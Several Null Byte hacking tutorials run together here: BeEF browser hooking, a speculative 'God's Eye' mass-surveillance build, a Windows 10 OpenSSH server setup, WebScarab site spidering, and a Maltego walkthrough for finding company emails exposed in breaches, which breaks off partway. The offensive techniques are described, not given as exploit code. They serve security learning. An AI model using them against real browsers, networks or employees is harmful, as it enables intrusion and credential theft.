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Got Beef? Getting Started with BeEF « Null Byte :: WonderHowTo
With the the general computer users understanding of Information security rising (at least to the point of not clicking on unknown links), and operating system security getting better by default. We need to look for new and creative ways to gain a foothold in a system.Luckily there are tools available to us, such as the one will we be looking at today, The Browser Exploitation Framework.Step 1: Finding BeEFIn Kali can be found under Applications>Kali>Exploitations>BeEF XSS FRAMEWORK,In BT......Step 2: Fire It UpWhen we click on the application we will be greeted with a new tab in our browser that looks like this. Sign in with the default credentials beef/beef.We'll now see this screen, with some important information to read, but for todays purposes we will focus on the first paragraph "Before being able to fully explore the framework you will have to 'hook' a browser. To begin with you can point a browser towards the basic demo page here, or the advanced version here."Step 3: Browser, Meet HooksAfter Clicking on the basic page's link you will see the basic page like this.However if you go back to the BeEF control panel tab you will notice in the far left corner there is a window called HOOKED BROWSERS, in the online browsers section you will see, Success!Step 4: Beat the MeatIf we click on our browser session in this far left window, our center window will change and we will be greeted with the details page, here we are displayed all the information BeEF was able to gather for us about the browser, Usually browser fingerprint, plug-ins that are running, all the good stuff we need to know to proceed with storming the castle.Where it says "details" you will notice a series of tabs click on commands, which will bring you here, to an absolute plethora of commands that we can play with, however today we will just focus on a simple but often effective command "Browser Redirection"Step 5: Redirect CommandWhile looking through the commands I'm sure you all noticed a folder called "Browser" which has a child called "Hooked Domain", go there, and you will find a command called "Browser Redirection"You will now notice a window on the far right that Contains a text box, and a little button in the bottom corner that says "execute" click this button and be amazed as the tab that was on the BeEF Demo Site, is redirected to the BeEF home page (or where-ever you pointed it in the text box).Have a play around with BeEF, go to your hooked page from another computer in your local network ( it will be at 192.168..:3000/demos/basic) and I'm sure you will start to see potential, which we will be covering in the next article on teaming BeEF up with one of Master OTW's client side attacks by burying meterpreter into a file and then serving it out using Browser Redirect.In the near future we will also be looking at how to "Hook" other web pages and all sorts of fun stuff that can be done with BeEF.Till then, you stay classy NullByteiansN.B there are images to come, Wonderhowto just doesn't seem to want to let me upload todayWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Use beEF (Browser Exploitation Framework)How To:Hack Web Browsers with BeEF to Control Webcams, Phish for Credentials & MoreHow To:Pull Italian Beef for Italian Beef SandwichExploiting XSS with BeEF:Part 2Hack Like a Pro:How to Get Facebook Credentials Without Hacking FacebookHow To:Use BeEF and JavaScript for ReconnaissanceHow To:Make beef bourguignon with smoky bacon with Tyler FlorenceHow To:BeEF - the Browser Exploitation Framework Project OVER WANHow To:Hook Web Browsers with MITMf and BeEFHow To:Beef Up Your Recipes with Beef SaltHow To:BeEF+Ettercap:Pwning MarriageHow To:Take Pictures Through a Victim's Webcam with BeEFHow To:Hack web browsers with BeEFHow To:Why You Should Start Eating Raw Meat (Or Eat More of It)How To:Make Perfectly Sized, Uniform Patties for Sliders & Mini Burgers Without Getting Your Hands DirtyHow To:Butcher a beef carcassNews:Top 10 Beef-less Burgers in LAHow To:Make Bourbon-Spiked ChiliNews:Homeless Terminator Goes Postal on AppleHow To:Cook a Yankee chuck beef pot roast with red wine
Advice from a Real Hacker: How I Would Build the God's Eye of Furious 7 « Null Byte :: WonderHowTo
In the recent hit movieFurious 7, the storyline revolves around the acquisition of a hacking system known as "God's Eye" that is capable of finding and tracking anyone in real time. Both the U.S. spy agencies and an adversarial spy agency (it's not clear who the adversary is, but the location is "beyond the Caucasus mountains," which could imply Russia?) desperately want their hands on this system.God's Eye was developed by a gorgeous female hacker named Ramsey (talk about breaking hacker stereotypes!), who was played by the beautiful Nathalie Emmanuel, which many of you may remember fromGames of Thrones. This tool could be used by these spy agencies to find anyone, anywhere, by tapping into every cell phone and surveillance camera.Nathalie Emmanuel as Ramsey in Furious 7.Image by Scott Garfield/Universal StudiosSince the movie came out, many people have been questioning and pondering whether the God's Eye is real, or could potentially be real. Pundits and technologists have unanimously concluded that the God's Eye is not real and not possible.But I disagree, and this is how I would build it.1. Nearly Unlimited Resources & AuthorityTo begin with, I will need to commandeer nearly unlimited resources and unrestrained legal authority. Something along the lines of $50 billion should work. That's approximately the annual budget of the NSA—or Mark Zuckerberg's fortune. Also, I will need the unrestrained legal authority of the NSA or the CIA. I could do it without the legal authority, but itssomuch easier with it.2. Collect All the Data Traversing the InternetThe first step would be to collect all of the information traversing the Internet. Maybe store it all in a huge database in some remote, god- forsaken place like Bluffdale, Utah. It will have data capacity on the scale of Google's data centers, or about 15 exabytes. That will cost about $1.5 billion.A view of the NSA's top-secret Utah Data Center in Bluffdale, UT.Image by Rick Bowmer/APThe next step is to build a database of everyone's face. I would make copies of everyone's face from their Facebook profile, Instagram pics, and text messages.Since Facebook has over 1.55 billion active users, and I would combine that with the pictures of their friends, colleagues, and family members in their profiles, as well as Instagram photos and text message attachments, that would give me over 2.5 billion faces in my database. That's about one-third of the planet's population. (If I include those text message attachments, I could build a database of other, lesser seen, biometric features as well).I would then build a biometric outline of everyone's face from these pictures. With recent advances in facial recognition software, I would then be able to match any image, found anywhere, of those 2.5 billion people to their identity with a high degree of certainty.Images via Unknown,Shutterstock3. Embed a Backdoor in Android & iOSThe next step would be to embed a backdoor in Android and iOS that would give me unlimited access to devices running those operating systems (Windows Phone and BlackBerry are bit players in the smartphone market, so I won't worry about them).First, I would "ask" Apple and Google nicely to have a backdoor placed in their operating systems for "national security" purposes. They always acquiesce when asked, and I'm sure they would again. The next update to your phone would install that backdoor, giving me access to all of your video, emails, text messages, and GPS location data.This would all go into my mega database. With all this smartphone data, I can predict where you will be at any moment from your patterns of movements in the past. For instance , I would know that at 7:32 a.m., you are on the freeway heading to work Monday through Friday.If they wouldn't agree to give me that backdoor, I would embed one in the developer kit so that every app developed and downloaded for those platforms would give me total access to everyone's phones. Recently, in China, the OS X developer kit for iOS had a backdoor built in that gave hackers nearly unlimited access to iPhones in China. I would do the same.Finally, if those methods don't work, I would simply contract withVupenor one of the other zero-day exploit writers, to find a vulnerability in those operating systems and then exploit them, giving me access. Should cost me about $2-5 million. That's really pocket change for this project.4. Build a Supercomputer to Process the DataNext, I will need supercomputer capable of 20 petaFLOPS to process all of this data in real time, as well as brute-force passwords and encryption algorithms. With this much horsepower, I would hash every possible password and put it into my database. In that way,breaking hashed passwordswould simply be a table lookup taking seconds.This supercomputer would have 150,000 nodes and 2,250,000 cores. It consumes about 6 MW of power (approximately the amount of power needed to supply 3,000-4,000 homes) and costs approximately $1 billion.Inside Facebook's data center in Prineville, Oregon.Image via Open Computer Project5. Hack All the Webcams & Surveillance CamerasNext, I would hack all the webcams and surveillance cameras.Shodanmakes it easy to find any webcam connected to the Internet.Many have no security. Those that do can be easily hacked by brute-forcing their passwords. With a 20 petaFLOPS supercomputer, that will take me seconds per camera.The feed from all of these cameras would be sent directly to my database.6. Set Up Surveillance Cameras EverywhereInFurious 7, the God's Eye has access to nearly every camera and microphone. I want to step that up a bit and add my own surveillance cameras.I would launch blimps and drones over every major city with high-resolution cameras similar to those on satellites, but rather than taking pictures from 100 miles away in space, I'd take them from 1,000 feet. That way, I could discern all of your facial features (even that pimple starting to emerge on your forehead), including your eye color. These would be similar to the spy blimp Raytheon just launched over Washington, DC and Baltimore, MD to track every movement—of every one—in those areas. Should cost me about another $5 billion.The JLENS, or "radar blimp," made by Raytheon.Image viaRaytheonThese drones and blimps will fly high enough that you won't even know they are there. They will only be visible at take-off and landing.A military blimp designed to cover the mid-Atlantic region through radar; taking off in Pennsylvania.Image by harleighwelsh1/TwitterNow, with a data center, supercomputer, 2.5 billion facial profiles, facial recognition software, access to almost every smartphone on the planet, access to every internet-connected surveillance camera, and additional surveillance cameras in the sky and on the ground, my God's Eye would be complete and I would still have change left from my $50 billion.On second thought, maybe I don't need to build God's Eye. I think somebody already has.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedNews:God's EyeTypoGuy Explaining Anonymity:Staying Hidden from the NSANews:4 Touched-by-the-Lord Potato Gun Video TutorialsHow To:Draw Angry God EyesHow To:Earn the "Obedience School" trophy in God of War 3How To:Build 3 decks for Yu-Gi-Oh-Gx! Tag Force 2! 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How to Create a Native SSH Server on Your Windows 10 System « Null Byte :: WonderHowTo
With the addition of theOpenSSHclient and server in theWindows 10 Fall Creators Update, you no longer have to rely on third-party programs to open an SSH server and connect to a Windows machine. While still a beta feature, this represents a long-overdue update fulfilling apromisemade back in 2015.TheOpenSSH clientallows you toSSHinto remote servers directly from the Windows command line. The server lets remote clients connect to your Windows 10 system, where they will be able to receive a command prompt for your system remotely. If you are familiar with OpenSSH from Linux, then you'll be right at home with the Windows 10 version.OpenSSH for Windows is definitely in beta form and should only be used in a safe, testing environment such as your home network. This shouldn't be used in production or opened to the internet. That being said, as time goes on, this implementation of OpenSSH should grow more secure and useful.To follow this guide, you'll need a Windows 10 computer that has been fully updated. Before starting, make sure to check for and install any updates Windows may have or these steps may not work properly. To check for updates, you can go to the Start button, and then go to "Settings" –> "Update & security" –> "Windows Update," then click on "Check for updates."Step 1: Enable Developer ModeTo begin, we need to ensure that the Windows system is set to "Developer mode," otherwise it will be impossible to download these beta features. Navigate to the search bar on the bottom left of your screen. Search for "developers settings" and it should appear underBest matchin the results. Select it to open the settings.Now you should see theUse developer featuresmenu. The "Windows Store apps" setting will be selected by default, so click on "Developer mode" to enable it. It should take a few moments to install the 6 MB file, and just like that, you're a Windows developer!Step 2: Install the OpenSSH ServerOnce developer mode is enabled, we're ready to install OpenSSH, and there are a few ways to do this, depending on your preferences. We'll cover both PowerShell and DISM.Method 1: Using PowerShellThe entire install process can be done inPowerShell, which is more convenient if you are installing OpenSSH on more than one computer. This could easily be turned into aUSB Rubber Duckyscript to make the process of setting up an SSH server lighting-fast. Some hackers might even start using this as a way to create an SSH backdoor on Windows systems.Don't Miss:How to Load & Use Keystroke Injection Payloads on the USB Rubber DuckyFirst, run PowerShell as the administrator by pressingWindows+Xon your keyboard and clicking on "Windows PowerShell (Admin)." Then, check to ensure that the OpenSSH features are available for installation by running the following command.Get-WindowsCapability -Online | ? Name -like 'OpenSSH*'The shell should return "NotPresent" which means that the server isn't yet downloaded. As you can see,I have the OpenSSH Client installed, and the server is available for installation.Assuming OpenSSH is available, you can install the server with the following command. If it is not available, make sure your system is updated and that developer mode is enabled, as those are the two most common problems which can cause this.Add-WindowsCapability -Online -Name OpenSSH.Server~~~~ that the prompt may say a restart isn't needed, but it's my experience that a restart is, in fact, required. When the process is complete, you should see something like the screen below.Method 2: Using DISMIf you'd prefer to use the command-line over PowerShell,Deployment Image Servicing and Management(DISM) is a command-line tool that we can also use to install the OpenSSH server.To begin installing OpenSSH with DISM, open a command prompt as an administrator. This can be done by searching for "CMD" in the search bar at the bottom left-hand corner of the screen. Right-click on "Command Prompt" and then select "Run as Administrator."Check that the OpenSSH features are available with the following command.dism /Online /Get-Capabilities | findstr OpenSSHIf you get the following, then you are ready to install the server.Install the server with this command:dism /Online /Add-Capability /CapabilityName:OpenSSH.Server~~~~ will need to reboot the computer after installation.Step 3: Generate Host KeysNow that we have the server installed, we need to generate host keys so the SSH server will be able to authenticate clients while it's in use. To do this, we will open PowerShell as the administrator by pressingWindows+Xand clicking on "Windows PowerShell (Admin)." Start the ssh-agent with the following command.Start-Service ssh-agentOnce the ssh-agent is running, we can move to the OpenSSH folder and begin generating a key. Usecdto change folders as seen in the first command below, and then create the key with the C:\Windows\System32\OpenSSH.\ssh-keygen -ANow, we can add the key to our SSH server with the following command..\ssh-add sshhosted25519_keyThis is the key that will be used from now on for our SSH connections.Don't Miss:How to Generate Private Encryption Keys with the Diffie-Hellman Key ExchangeStep 4: Install the OpenSSHUtils Helper ModuleYou could attempt to use the SSH server now, but if you do, you'll run into a whole slew of errors. This is because the server is still in beta, and is very finicky.To help resolve these issues, Microsoft has created the OpenSSHUtils helper module, which will appropriately add your host keys and set permissions to the Access Control List (ACL). To install OpenSSHUtils, we will run the command below.Install-Module -Force OpenSSHUtilsIt may also ask to install the package managerNuGet. If you don't already have it, typeyto install it.Once that's done, we are ready to run the helper module, which should clean up those errors we saw before. Run the following command to install it.Repair-SshdHostKeyPermission -FilePath C:\Windows\System32\OpenSSH\sshhosted25519_keyYou will revive a number of prompts; useyas your response to all of the prompts to set the file permissions correctly. As you can see below, you have to say yes quite a few times.Step 5: Open a Port in the FirewallNow, everything should be ready to go on the SSH server side of things. We just need to open a port in the firewall so we can establish an SSH connection with a client outside of the current Windows system. Your requirements may vary based on your environment, but in general, the following firewall rule should work for most Windows users. Input the following command to open a local port 22 named SSH.New-NetFirewallRule -Protocol TCP -LocalPort 22 -Direction Inbound -Action Allow -DisplayName SSHStep 6: Start Your New SSH ServerThat's it. You're ready to start using your SSH server! One thing to note, only the built-inED25519 authentication key typeis currently supported. There are plans to addLibreSSLin the future, which will enable additional authentication key types, but as of yet, that has not been done. So for now, use an ED25519 key to connect to the server.The SSH server doesn't start up automatically, so we have to start it manually each time we wish to use the server by typingStart-Service sshdinto our PowerShell window. You can check to see that it's running withGet-Service sshd.You should always remember to stop the service when not in use withStop-Service sshdto maintain the security of your system.To connect to your new SSH server, use your favorite SSH client such asPuTTYor thenew OpenSSH client. In general, you can use the following format to connect.ssh username@host -p portWhen you connect to your new server, you'll find that you get a full command prompt, which can run all command line tools, even PowerShell! With the addition of the OpenSSH Client to Windows 10 as well, you now have an extra layer of flexibility where you can directly connect two Windows systems over SSH.Don't Miss:How to Use SSH Local Port Forwarding to Pivot into Restricted NetworksWindows Is Easier Than Ever to Administer RemotelyThe new built-in SSH server is a welcome addition to Windows 10. It represents Microsoft taking steps to listen to developers and system administrators to meet their needs. This new feature allows you to manage a Windows machine much more easily, and as Windows continues to improve and implement OpenSSH as a full feature, I believe more and more people will come to use it due to its ease of use and convenience. The days of the third-party SSH servers dominating the Windows field are numbered.Thanks for reading! If you have any questions, you can ask me here or on Twitter@The_Hoid.Don't Miss:How to Enable the New Native SSH Client on Windows 10Follow Null Byte onTwitter,Flipboard, andYouTubeFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image and screenshots by Hoid/Null ByteRelatedHow To:Enable the New Native SSH Client on Windows 10Hacking Windows 10:How to Use SSH Tunnels to Forward Requests & Hack Remote RoutersHow To:Use the Chrome Browser Secure Shell App to SSH into Remote DevicesHacking Windows 10:How to Turn Compromised Windows PCs into Web ProxiesHow To:Run Your Favorite Graphical X Applications Over SSHSSH the World:Mac, Linux, Windows, iDevices and Android.Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 15 (Creating a Secure Tunnel to MySQL)How To:Set Up an SSH Server with Tor to Hide It from Shodan & HackersSPLOIT:How to Make an SSH Brute-Forcer in PythonHow To:Configure a Reverse SSH Shell (Raspberry Pi Hacking Box)How To:Locate & Exploit Devices Vulnerable to the Libssh Security FlawHow To:Detect Misconfigurations in 'Anonymous' Dark Web Sites with OnionScanHacking Windows 10:How to Hack uTorrent Clients & Backdoor the Operating SystemHow To:Use the Cowrie SSH Honeypot to Catch Attackers on Your NetworkHow To:Create an SSH tunnel for your Mac Mini serverHow To:Discover & Attack Services on Web Apps or Networks with SpartaHow To:Use SSH Local Port Forwarding to Pivot into Restricted NetworksHacking Windows 10:How to Capture & Exfiltrate Screenshots RemotelyHow To:Upload a Shell to a Web Server and Get Root (RFI): Part 1How To:Build a Beginner Hacking Kit with the Raspberry Pi 3 Model B+Rasberry Pi:Connecting on ComputerAndroid for Hackers:How to Backdoor Windows 10 Using an Android Phone & USB Rubber DuckyHacking Windows 10:How to Remotely Record & Listen to the Microphone of a Hacked ComputerHack Like a Pro:How to Crash Your Roommate's Windows 7 PC with a LinkHow To:SSH and FTP into a serverHow To:Remotely Control Computers Over VNC Securely with SSHHow To:Push and Pull Remote Files Securely Over SSH with PipesHow To:Create a Free SSH Account on Shellmix to Use as a Webhost & MoreHow To:Create an SSH Tunnel Server and Client in LinuxHow To:Safely Log In to Your SSH Account Without a PasswordHow To:Stream Media to a PS3 or Xbox 360 from Mac & Linux ComputersNews:What does Pro Tools HD Native mean for you?How To:Mask Your IP Address and Remain Anonymous with OpenVPN for LinuxHacking Reconnaissance:Finding Vulnerabilities in Your Target Using NmapHow To:Run an FTP Server from Home with LinuxHow To:Create Your Own Native American Girl Halloween Costume
Hack Like a Pro: How to Hack Web Apps, Part 2 (Website Spidering with WebScarab) « Null Byte :: WonderHowTo
Welcome back, my tenderfoot hackers!Now that we have begun this trip downweb app hacking lane, we need to first address target reconnaissance. Like any hack,reconnaissanceis critical. (Are you tired of me saying that yet?)There is no better telltale sign of a script-kiddie than a hacker who runs willy-nilly into trying to hack/exploit without doing proper recon. They say they don't "have time" to do proper recon, then when they are invariably unsuccessful, they scratch their head and ask, "Why didn't this hack work?"For a professional hacker, reconnaissance is often 70% or more of the time we spend on a hack. Since each hack/exploit is specific to a vulnerability, and the vulnerability is specific to the OS, the ports, the apps, the technologies used, and even the language, hacking without recon is simply an exercise in futility.Web App ReconnaissanceI think it's important to note here that web app reconnaissance is a process and not a tool. Before attacking a web app, you need to gather as much information as possible. In some cases, you will get conflicting information, and when that happens, you may need to run another reconnaissance tool or technique.Here are some of the tools and tutorials that I have already covered that you can use for reconnaissance.Operating System- The underlying operating system of the target can often be determined by usingNmap,Xprobe2,P0f, orNetcraft.Web Server- The underlying web server can often be determined byNetcraft, banner grabbing withNetcat,Httprint, orShodan.Web Technologies- The underlying technologies can be determined withNetcraft.DNS- You may need toperform DNS reconto find hidden servers.Wikto- This is an excellent tool for finding so much information on the website including finding hidden directories and Google hacking.DirBuster- OWASP's tool maps nearly every directory in a website and often finds hidden or unknown directories in a website.Maltego- This tool is great for many of the above tasks, as well as social networking relationships.Httrack- This tool enables us to make a copy of the website for online reconnaissance and analysis before exploitation.Website SpideringBefore a website attack or penetration test, we need to spider the site. Many of the tools we use to attack a site need a map of the website in order to do their work. We could manually spider the site by simply navigating to each page and saving it, but fortunately, we have tools that can save us time and automate this process. The tool we will use here is calledWebScarabbyOWASP. It's built into Kali, so no need to download or install anything.Step 1: Fire Up Kali & Open WebScarabLet's begin by firing upKaliand then navigate to Applications -> Kali Linix -> Web Applications -> Web Crawlers -> webscarab.Step 2: WebScarabWhen we click on the webscarab option, it opens with a GUI interface like that below. As you can see, WebScarab has many web reconnaissance features, but here we will focusing on its ability to spider a website. In later tutorials, we will explore some of its other capabilities.Step 3: Configure Your BrowserBefore we begin spidering a website, we need make certain that your browser is configured properly. By default, WebScarab uses a proxy on on 8008. You can change it by clicking on the "Proxy" tab, but for now, let's keep the default setting and make certain that our browser is using the same setting.For more information on configuring the proxy setting in IceWeasel, seemy tutorial on THC-Hydra and Burp Suite.Step 4: Point WebScarab at a WebsiteNow, to see how WebScarab can spider a site, let's point it at our favorite website,WonderHowTo. In the "Allowed Domains" window, simply type, go to your browser, in this case IceWeasel, and navigate When we do so, WebScarab will begin to populate the main window with every web address linked on that page. Note that the webpages are arranged in alphabetical order.Let's navigate down a bit to the Ns and find We can click on it and expand all the links withinNull Byte, our favorite hacker training site.In this way, we can now see every webpage and link on the target website. In a future tutorial, when we begin the attack phase, we will see how we can actually use this information.Keep coming back, my tenderfoot hackers, as we exploreweb app hacking!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image viaShutterstock,OWASPRelatedHack Like a Pro:How to Hack Web Apps, Part 1 (Getting Started)Hack Like a Pro:How to Hack Web Apps, Part 5 (Finding Vulnerable WordPress Websites)Hack Like a Pro:How to Hack Web Apps, Part 6 (Using OWASP ZAP to Find Vulnerabilities)News:How to Study for the White Hat Hacker Associate Certification (CWA)Hack Like a Pro:How to Find Website Vulnerabilities Using WiktoHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 11 (Apache Web Servers)How To:Launch Apps, Tasks, & Websites Directly from Your iPhone's Notification CenterHow To:The Safest Way to Disable ALL Bloatware on Your Galaxy S10Hack Like a Pro:How to Hack Web Apps, Part 7 (Finding Hidden Objects with DIRB)How To:A Security Bug Just Made It Risky to Open Links on Your iPhone—Here's How to Protect YourselfBest Android Antivirus:Avast vs. AVG vs. Kaspersky vs. McAfeeHack Like a Pro:How to Hack Like the NSA (Using Quantum Insert)Hack Like a Pro:How to Hack Web Apps, Part 4 (Hacking Form Authentication with Burp Suite)Firefox Mobile 101:How to Turn Websites into Apps on Your Home Screen with the New Quantum BrowserHow To:Expand Your Coding Skill Set with This 10-Course Training BundleNews:8th Wall Spins Up New 'Spider-Man: Into the Spider-Verse' Augmented Reality Experience for Blu-Ray, DVD ReleaseHack Like a Pro:How to Hack Facebook (Same-Origin Policy)Hack Like a Pro:How to Fingerprint Web Servers Using HttprintHow To:Save Custom Shooting Presets in Filmic Pro So You Don't Have to Adjust Settings Later for Similar ShotsHow To:This Android App Lets You Cast Unsupported Web Videos to ChromecastHow To:No Data, No Problem—Use SMS to Connect to Your Favorite Web Services on AndroidHow To:If You're Seeing Lock Screen 'DU' Malware When Charging, Uninstall These Apps Right NowHow To:Get LED Color Effects for Music Playing on Your AndroidHow To:Generate Viral Memes Like a Pro with These Apps for Your iPhoneNews:8th Wall Adds Another Brick to Its Web AR Platform with AR Camera for Easy PrototypingHow To:Control Your iPhone Using Your EyesHow To:Get Nokia's Exclusive Camera App with Pro Mode on Any AndroidHow To:Get the Chrome Experience on Android Without Google Tracking YouHow To:Hack websites using cross-site scripting (XSS)How To:Hack web browsers with BeEFHow To:Sneak Past Web Filters and Proxy Blockers with Google TranslateNews:An Introduction to Macro Photography (Plus Some Insane Shots)How To:Use JavaScript Injections to Locally Manipulate the Websites You VisitHow To:Hack Anyone's Facebook, Twitter or YouTube Account with Your Android DeviceHow To:The Official Google+ Insider's Guide IndexHow To:Spider Web Pages with Nmap for SQLi VulnerabilitiesNull Byte:Never Let Us DieNews:Indie Game Mashup! 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How to Use Maltego to Target Company Email Addresses That May Be Vulnerable from Third-Party Breaches « Null Byte :: WonderHowTo
The easiest way around a security policy is to find users who don't follow it. TheHave I Been Pwneddatabase identifies accounts with information breached by major third parties like Yahoo and LinkedIn. With Maltego, hackers can locate breached accounts created using company email addresses, potentially giving attackers access to a company account if the employee reuses a compromised password.Follow along with the video above to learn how to use Maltego to target company email addresses that may have a vulnerable password. You can also refer to article below for more information (jump right to the stepsif you want!).OSINT for ReconWhen a hacker targets an organization,reconnaissanceis the phase of observing the target until a particular "weakest link" makes itself apparent. This initial research will identify the best way to achieve whatever the hacker's agenda is and will often start by identifying easy methods of gaining access, like targeting employees with poor security hygiene.Because sendingphishing emailsto steal account credentials is the most common way hackers break into a network, it's helpful for a hacker to be able to locate users who may be particularly vulnerable to this kind of attack. A hacker can save considerable time by usingopen-source intelligence(OSINT) techniques to research a target and look for opportunities indicated by human behavior, like creating third-party accounts with company email addresses.Hackers have many OSINT tools available for researching targets, but for answering more complex research questions or for conducting an investigation, Maltego is an excellent choice. Maltego can take a single piece of information and discover links to more pieces of data, allowing us to pull together a more complete picture in order to answer a question. In this case, the question we want to know is if any employees have entered their work email into a third-party website and had their credentials breached. If possible, we'd also like to track down the actual password the target had lost in the breach.Don't Miss:How to Use Maltego to Do Network ReconnaissanceHow Maltego Discovers InformationMaltego is an OSINT investigation tool designed to answer questions by pulling in related information via API pulls and then comparing the data to look for meaningful relationships. This helps a human investigator by presenting relationships between data in a clear and understandable way that might not immediately be obvious. Maltego is also great at starting with a single point of information and expanding to include much more data as different transforms are run. Transforms are a hybrid between an API pull and an algorithm to sort the data returned, which Maltego uses to find and display relationships.Taking this model, we can use Maltego transforms to break down a question into smaller pieces. In this case, we will need to locate email addresses associated the organization we are targeting. Next, we will need to expand the sample of email addresses we have to include as many samples as possible. When we have a good sample size, we can use a special transform to search databases of breached accounts to locate whether any of the emails we've found have been involved in a breach. Finally, we can enrich the breach data to learn about what details were lost and when the breach occurred.Don't Miss:How to Use Maltego to Research & Mine Data Like an AnalystWhy the Weakest Link Is Usually EmployeesWhile Maltego is often used for targeting infrastructure, we can also use it to target people. To do this, we will focus on the ways people identify themselves online. This usually means tracking screen names, email addresses, aliases, and other pieces of information that link a person to an organization or service. In this case, we'll be harvesting email addresses as our primary people-tracking method.A hacker can use this ability to track users across the internet or mine for relationships between users and organizations. While Maltego shines in its social media monitoring and tracking abilities, we'll simply be using various data scraping techniques to gather more employee email addresses into our data set to look for behaviors associated with a lack of concern for security.Don't Miss:Use Facial Recognition to Conduct OSINT Analysis on Individuals & CompaniesIn the worst-case scenario, a target could be unlucky enough to be reusing the same password between their company account and other third-party accounts. If the third party account password and email combination are stolen and leaked, a hacker could breach the victim's other accounts using the stolen username and password combination.The 'Have I Been Pwned' Transform & WebsiteThe Maltego transform we will use to preform this investigation is the Have I Been Pwned transform, which will query a database of breached personal information which has been leaked online and compiled. This database is maintained by researchers in order to easily identify if a particular email address has been invovled in a breach.While the web version allows you to do one search at a time, using the Maltego transform to run the query allows us to search for many email addresses at the same time.Step 1: Install MaltegoTo install Maltego, you'll need to have Java installed on your machine (Maltego uses Java 8 and does not support Java 9 at this time). If you're using Kali Linux, Maltego should be installed by default on your virtual machine or install. If you're using macOS or Windows, you can simply downloadMaltego Community Edition from the Paterva website.Once you install Maltego, you should be able to open the application and log in. You will need tocreate a free account with Patervato use the Community version.Step 2: Install the HaveIBeenPwned TransformOnce you log in, you should be redirected to the main transform hub. Here, you can install free and paid transforms to enrich data you find. We will need to make sure the "haveibeenpwned" transform has been installed, which can be found in the lower-right corner in the example below.Step 3: Create a New GraphWhen the "haveibeenpwned" transform is installed, you can click on the document icon with the green plus on it in the top-left corner of Maltego to create a blank canvas. This is where we will start our investigation.Step 4: Find Email Addresses from an OrganizationTo get started with scraping email addresses from an organization, we can either use the "Company Stalker" machine, which provides a simple way of scraping a lot of data all at once, or add the company domain to our blank canvas.Don't Miss:Use Facial Recognition to Conduct OSINT Analysis on Individuals & CompaniesTo add an entity to our canvas, we can select any of the icons in the left entity palate and drag and drop them into the main graph. By double-clicking the entity you added to the graph, you can add information or access properties of the entity.The "Company Stalker" can quickly take a single domain and attempt to find both related email addresses and any other information that might be relevant from that domain. This is a fast way to get started by using a chain of transforms designed to start your investigation with some juicy data points to follow.To start a machine, click on the "Machines" tab near the top of the Maltego window. Next, click the "Run Machine" icon to select which machine to run.From theStart a Machinewindow, you can select which machine you want to run. In this case, select the "Company Stalker."Next, enter the name of the domain you wish to find email addresses from. Click "Finish" when you're done to run the machine. Here, we use the example to show a larger collection of data being found.After clicking "Finish," you will begin to see data appear on the graph. This should be a mix of email addresses, found documents, persons identified, and other data Maltego finds on the domain in question.As seen in the example above, we were able to gather several email addresses from, but the next step will be enriching these email addresses to improve our sample size.Step 5: Enrich Your Employee Email ListAfter examining the data found in our first pull, we can delete entities that aren't relevant to our search by sorting on theDetail Viewwindow by entity type, selecting all the types you want to delete, and right-clicking on the selected group to show the "Delete" option, which should be a red "X."After cleaning up the graph, select all the email addresses you found in theDetail Viewpane. From here, we can run a series of transforms to identify any accounts that have been breached or any additional sources we may find of email addresses.Don't Miss:How to Use SpiderFoot for OSINT GatheringWhen you right-mouse click the email addresses you've selected, type "haveibeenpwned" into the search bar on top to show all available transforms from the Have I Been Pwned transform set. In particular, we will run transforms to find all breaches and any Pastebin dumps including the email addresses selected.Once run, the transform should return a list of Pastebin dumps and account breaches attributed to the email address you selected. From here, we can look for Pastebin URLs that include lists of company email addresses.In the example below, our first query actually uncovered a few email addresses involved in breaches, as well as no less than six Pastebin URLs that include related email addresses.We can double-click on any of these, and then click "Properties," to find the URL of the Pastebin dump.Taking this address, we can go directly to the Pastebin dump and search for other email addresses to find. There were quite a few. We can select, copy, and paste these directly into Maltego.You can do the same with any other email addresses you find, and then run the earlier transform on them to see if they appear in any other Pastebin dumps. We can also include email addresses found through the use of other email scrapers likeTheHarvester.Don't Miss:How to Scrape Target Email Addresses with TheHarvesterThrough repeating this several times, you can find many more email addresses to add. When you paste in a new email address, Maltego should detect the data type and assign it automatically.Step 6: Identify Email Addresses of Breached EmployeesNow that we've gathered a list of employee emails, we can begin passing them through the Have I Been Pwned transform to find which may have been involved in a breach.Select all of the email addresses we've found, and press the double "play" icon next to the "haveibeenpwned" transform item. This will run all the transforms contained in that set at the same time, looking both for breaches and Pastebin dumps.When the results are complete, we should have a list of email addresses involved in breaches. Our results returned with several email addresses which were involved in known breaches.Now that we've found who has been losing credentials, we can take the next step to find out who lost what.Step 7: Discover What Was Lost by WhoWe 